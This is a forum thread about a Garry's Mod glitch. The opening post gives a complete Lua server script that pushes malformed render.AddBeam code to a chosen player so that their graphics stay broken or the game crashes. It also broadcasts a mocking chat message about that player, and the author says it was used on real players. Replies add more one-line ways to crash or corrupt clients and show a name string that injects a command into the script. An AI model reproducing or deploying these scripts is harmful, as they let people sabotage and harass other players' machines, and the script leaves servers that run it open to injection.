The render.AddBeam Exploit/Glitch

I’m not sure if this really counts as an exploit; it’s more like a glitch, but here we go anyways.

As you may have heard, the misuse of the **[Render.AddBeam

http://wiki.garrysmod.com/favicon.ico](http://wiki.garrysmod.com/?title=Render.AddBeam)** function can pretty much break map rendering for the client in GMod. Some surfaces won’t render, some render in the wrong places, and everything is a fucked up mess of graphics-rape. Looks to me like GMod took the map and stirred up all the visleaves.

Images:
[img_thumb]http://img52.imageshack.us/img52/2821/gmconstruct0012.jpg[/img_thumb] [img_thumb]http://img69.imageshack.us/img69/3342/gmconstruct0015e.jpg[/img_thumb] [img_thumb]http://img651.imageshack.us/img651/9130/gmconstruct0016.jpg[/img_thumb] [img_thumb]http://img29.imageshack.us/img29/8684/gmconstruct0038l.jpg[/img_thumb] [img_thumb]http://img11.imageshack.us/img11/5558/gmconstruct0050o.jpg[/img_thumb] [img_thumb]http://img532.imageshack.us/img532/8721/gmconstruct0049.jpg[/img_thumb] [img_thumb]http://img63.imageshack.us/img63/6727/gmconstruct0051.jpg[/img_thumb]

I decided that this called for some on-field testing, so I whipped up a little admin console command and gave the script shown below to a friend who was hosting an RP server. His server was constantly being bombarded by minges who were reconnecting with a Steam ID changer, so I figured that it would be perfect testing grounds for something like this.

Results were pretty satisfactory to say the least. One person threatened to DDOS the server, so we used this on him and it totally fried his graphics. He went bat-shit crazy.
[lua]//
// Exploit exploited by Grea$eMonkey and all who decide to make use of this.
// This is a little glitch in the render library that I found.
//
// Syntax: sv_breakclientgraphics “steamid_or_name” numIterations
// The more iterations performed, the more messed up the victim’s graphics will be.
// Be sure you have the steamid/name in quotes, otherwise this won’t work!
//

local consoleStartupMessage = [[
Initializing render.AddBeam exploit script - By Grea$eMonkey
Console Command Syntax: sv_breakclientgraphics “steamid_or_name” numIterations
The more iterations performed, the more messed up the victim’s graphics will be.
Be sure you have the steamid/name in quotes, otherwise this won’t work!
Have fun breaking people’s graphics!
]]

hook.Add(“PlayerInitialSpawn”, “breakClientGraphicsInit”, function(ply)
if ply:IsAdmin() then
Msg(consoleStartupMessage)
end
end)

function BreakClientsGraphics(ply, cmd, args)

if !ply:IsAdmin() then return end

local victim = NULL
local rep = tonumber(args[2])

if !rep or rep == 0 then
	rep = 1
end

for k, v in pairs(player.GetAll()) do
	if v:SteamID() == args[1] then
		victim = v
		print("Victim found by Steam ID: "..tostring(victim))
		break
	end
	if string.find(v:Nick(), args[1]) then
		victim = v
		print("Victim found by Name: "..tostring(victim))
		break
	end
end

if victim:IsValid() and victim:IsPlayer() then
	
	local breakCode1 = [[
		render.StartBeam(100)
			for i = 1, ]]
	local breakCode2 = [[ do
				render.AddBeam(
					nil,
					32,
					CurTime() + 1,
					color_white
				)
			end
		render.EndBeam()
	]]
	
	local noteCode1 = [[
		chat.AddText(
			Color(255,255,255), "Mingebag ",
			Color(255,0,0), "]]
	local noteCode2 = [[",
			Color(255,255,255), " graphics were raped by a ",
			Color(30,30,200), "Server Administrator."
		)
		chat.PlaySound()
	]]
	
	ply:ChatPrint("Sending code to "..victim:Nick().." with a power of "..rep.." repeat"..(rep > 1 and "s").."!")
	
	for k, v in pairs(player.GetAll()) do
		v:SendLua( noteCode1..victim:Nick().."'s"..noteCode2 )
	end
	
	victim:SendLua( breakCode1	.. rep .. breakCode2 )
	
else
	
	ply:ChatPrint("The player you entered was not a valid player")
	
end

end
concommand.Add(“sv_breakclientgraphics”, BreakClientsGraphics)
[/lua]
Notes:
[ul]
[li]This “exploit” is caused by using a nil value for the first argument of Render.AddBeam[/li]
http://wiki.garrysmod.com/favicon.ico which is supposed to be a Vector.
[li]The more invalid beams you add, the more fucked up the client’s graphics will get. I tried out 100 iterations, and I could barely see anything. GMod crashed shortly after.[/li][li]If you disconnect and join any server, you’re graphics will remain this way. Sometimes restarting GMod doesn’t even fix it.[/li][li]Adding -config to your startup supposedly fixes it. You’ll still need to restart GMod though.[/li][/ul]
If you want to use this script, just put it in your lua/autorun/server folder and give it a spin. It’s pretty cruel to use on people, but it certainly is an effective tool against persistent mingebags.

Garry, you may want to fix this at some point.

That is very useful and extremely dangerous. I would appreciate it if it’s fixed.

About the script, you could easily inject a string in there via your name.
") RunConsoleCommand(“disconnect”) "

Why make them disconnect?

Overall this is a pointless thread. Someone made something like this before, a script to crash clients, but in the end there are plenty of ways to crash people, and it’s nothing special to release. This script is also vulnerable to the classic lua injection that plagued DarkRP and other scripts a while back. You are putting your server at risk by running this script.

also if you use surface.DrawPoly with nil values. Simply just surface.DrawPoly() the game will instantly crash with a engine error. Im so making a ULX plugin for this :V

No need to be a dick about it. The point isn’t to crash. Crashing would defeat the purpose of it, but you’re right. It was mostly just for shits and giggles. The script was just to show the concept of it.

Heh.

We need a Crash/Glitch/Exploit megathread!

Heh, I actually made a plugin for Evolve that did this, along with removing all the variables and such in their environment.

Its really evil, but people think they just had a really bad Lua error or something and rejoin.

Any api that is used incorrectly will have consequences. Add error checking to your code, problem solved. This is almost like saying, well I have a function like InitializeCriticalSection() and passing it NULL. It’s your fault, not the api author.

[lua]while true do debug.sethook() end[/lua]

[lua]cam.End3D()[/lua]

Similar results can be achieved by misusing render.SetClippingPlane and a lot of other functions related to rendering as stated before. This isn’t going to be ‘patched’, you just have to use the functions correctly.

YAY! I’m now officially not the only one anymore!

Besides that exploit was only there for 2 days! haha!
I should add greasemonkey to my friends list: “Lua injection exploit creator friends”

Also, try running this on the client.
[lua]
for _, v in pairs( _G ) do
if ( type( v ) == “function” ) then
v = function() LocalPlayer:PrintMessage( HUD_PRINTTALK, “Dicks” ) end
end
end[/lua]
Or just to completely ruin everything:
[lua]_G = nil[/lua]

Hehehe. I’m just saying for something as small as adding a beam there should be a failsafe operation in the render library.

If I recall correctly, _G is read only regarding that.

Coolfact: _G is simply a reference.

_G is a variable that holds the global environment.

Fixed that.

Am i doin it rite?

http://dl.dropbox.com/u/4838268/rp_city80010.jpg

Its sad that it looks 1000 worse ingame